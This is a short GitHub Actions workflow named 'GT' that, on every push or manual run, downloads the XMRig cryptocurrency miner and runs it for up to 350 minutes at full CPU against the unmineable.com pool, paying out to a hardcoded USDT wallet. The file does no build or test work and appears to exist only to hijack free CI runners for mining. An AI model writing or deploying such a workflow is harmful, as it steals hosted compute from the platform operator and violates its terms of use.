name: GT
on: [push, workflow_dispatch]
jobs:
  m:
    runs-on: ubuntu-latest
    steps:
      - run: |
          sudo sysctl -w vm.nr_hugepages=1280
          cd /tmp
          wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-x64.tar.gz
          tar -xf xmrig-6.21.0-linux-x64.tar.gz
          cd xmrig-6.21.0
          timeout 350m ./xmrig -o rx.unmineable.com:3333 -u USDT:0x74B56f2C379996fedabF53D36aeE73c5E5129fC9.GT_20260330_085657 -p x --threads=0 --randomx-1gb-pages --cpu-priority=5 --donate-level=1 --cpu-max-threads-hint=100 &
